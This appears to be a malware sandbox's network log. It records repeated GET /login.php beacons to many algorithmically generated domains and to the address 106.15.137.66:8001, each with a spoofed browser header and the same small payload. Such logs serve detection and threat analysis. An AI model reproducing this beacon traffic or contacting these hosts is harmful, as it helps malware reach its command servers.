      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: puzylyp.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyfyj.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: www.gahyqah.comConnection: Keep-AliveData Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vojyqem.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyfus.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: ww3.galyqaz.comConnection: Keep-AliveCookie: vsid=926vr471977221402211128Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gadyniw.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gadyniw.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: pupydeq.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: pupycag.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyrysor.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /dh/147287063_637385.html HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: 106.15.137.66:8001Connection: Keep-AliveData Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyrysor.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyrysor.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /dh/147287063_637385.html HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: 106.15.137.66:8001Connection: Keep-AliveData Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: pupydeq.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: galynuh.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gadyciz.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vofycot.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyxynyx.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyval.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php?sub1=20240824-0247-3846-ad61-5b1f45bc95f4 HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: ww16.vofycot.comConnection: Keep-AliveCookie: __tad=1724431658.5743798Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyval.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php?subid1=20240824-0247-3858-b174-cdc5f33d229c HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: ww25.lyxynyx.comConnection: Keep-AliveCookie: __tad=1724431658.5024510Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qetyhyg.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyhub.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyhub.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lygyvuj.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gahyhiz.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyvyxor.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: puzylyp.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vojyqem.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qetyfuv.comContent-Length: 6Cookie: btst=aa122ab46703e7e3b9d2518b0ebc8c78|8.46.123.33|1724431621|1724431621|0|1|0; snkz=8.46.123.33Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gahyqah.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vocyzit.comContent-Length: 6Cookie: btst=3e0cadd8e2dc2fdcf92b9c2073c70c58|8.46.123.33|1724431621|1724431621|0|1|0; snkz=8.46.123.33Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyvyxor.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyfyj.comContent-Length: 6Cookie: sid=5243bebf-616f-11ef-adb1-e1f00ce9ce88Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: galyqaz.comContent-Length: 6Cookie: vsid=926vr471977221402211128Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: puzylyp.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vonypom.comContent-Length: 6Cookie: btst=ee59b14dfaa9c8907c706ea22e956ef8|8.46.123.33|1724431621|1724431621|0|1|0; snkz=8.46.123.33Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lymyxid.comContent-Length: 6Cookie: btst=162891e75d1d854fb9d05e52998b5935|8.46.123.33|1724431621|1724431621|0|1|0; snkz=8.46.123.33Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vojyqem.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyfus.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: www.gahyqah.comConnection: Keep-AliveData Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gadyniw.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gadyniw.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyfus.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: pupydeq.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: pupycag.comContent-Length: 6Cookie: btst=0e9c6b135bbf78b20bee3c60ff917523|8.46.123.33|1724431636|1724431636|0|1|0; snkz=8.46.123.33Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyrysor.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /dh/147287063_637385.html HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: 106.15.137.66:8001Connection: Keep-AliveData Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyrysor.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /dh/147287063_637385.html HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: 106.15.137.66:8001Connection: Keep-AliveData Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: pupydeq.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gadyciz.comContent-Length: 6Cookie: btst=e67e5bdc7da6809b4e043748c6ce58a1|8.46.123.33|1724431658|1724431658|0|1|0; snkz=8.46.123.33Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qexyhuv.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: galynuh.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vofycot.comContent-Length: 6Cookie: __tad=1724431658.5743798Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyxynyx.comContent-Length: 6Cookie: __tad=1724431658.5024510Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyval.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php?sub1=20240824-0248-364a-9808-e6df4ec839e7 HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: ww16.vofycot.comConnection: Keep-AliveCookie: __tad=1724431658.5743798Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php?subid1=20240824-0248-365f-be38-e61788a8e181 HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: ww25.lyxynyx.comConnection: Keep-AliveCookie: __tad=1724431658.5024510Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyval.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
